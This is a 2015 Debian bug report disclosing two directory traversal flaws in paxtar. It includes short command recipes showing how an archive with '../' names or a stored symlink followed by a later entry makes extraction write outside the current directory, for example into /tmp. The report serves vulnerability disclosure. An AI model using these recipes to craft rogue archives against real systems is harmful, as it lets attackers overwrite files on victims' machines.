Bug#774716: paxtar: directory traversal vulnerabilities

To: submit@bugs.debian.org
Subject: Bug#774716: paxtar: directory traversal vulnerabilities
From: Alexander Cherepanov <cherepan@mccme.ru>
Date: Tue, 06 Jan 2015 21:42:04 +0300
Message-id: <[🔎] 54AC2C7C.1020005@mccme.ru>
Reply-to: Alexander Cherepanov <cherepan@mccme.ru>, 774716@bugs.debian.org

Package: pax
Version: 1:20140703-2
Tags: security

paxtar is susceptible to directory traversal vulnerabilities. They canbe exploited by a rogue archive to write files outside the currentdirectory.


1. paxtar will extract files with .. components in names.

For example, let's create a sample archive:

  echo hello > ../file
  paxtar cvf test.tar ../file
  rm ../file

and then test it:

  paxtar xvf test.tar

This will create a file "../file".

2. While extracting an archive, it will extract symlinks and then followthem if they are referenced in further entries.


For example, let's create a sample archive:

  ln -s /tmp dir
  paxtar cvf test.tar dir
  rm dir
  mkdir dir
  echo hello > dir/file
  paxtar rvf test.tar dir/file
  rm -r dir

and then test it:

  paxtar xvf test.tar

This will create a symlink "dir" in the current directory and a file"/tmp/file".


--
Alexander Cherepanov

Reply to:

Follow-Ups:
- Bug#774716: paxtar: directory traversal vulnerabilities
  - From: Thorsten Glaser <tg@mirbsd.de>
- Processed: Re: Bug#774716: paxtar: directory traversal vulnerabilities
  - From: owner@bugs.debian.org (Debian Bug Tracking System)
- Bug#774716: paxtar: directory traversal vulnerabilities
  - From: Salvatore Bonaccorso <carnil@debian.org>

Prev by Date: Bug#774716: paxtar: directory traversal vulnerabilities
Next by Date: Bug#743686: ulatencyd: Ulatencyd start without consolekit support
Previous by thread: Bug#711685: marked as done (pbbuttonsd is not rewritten for kernel 3.2)
Next by thread: Bug#774716: paxtar: directory traversal vulnerabilities
Index(es):
- Date
- Thread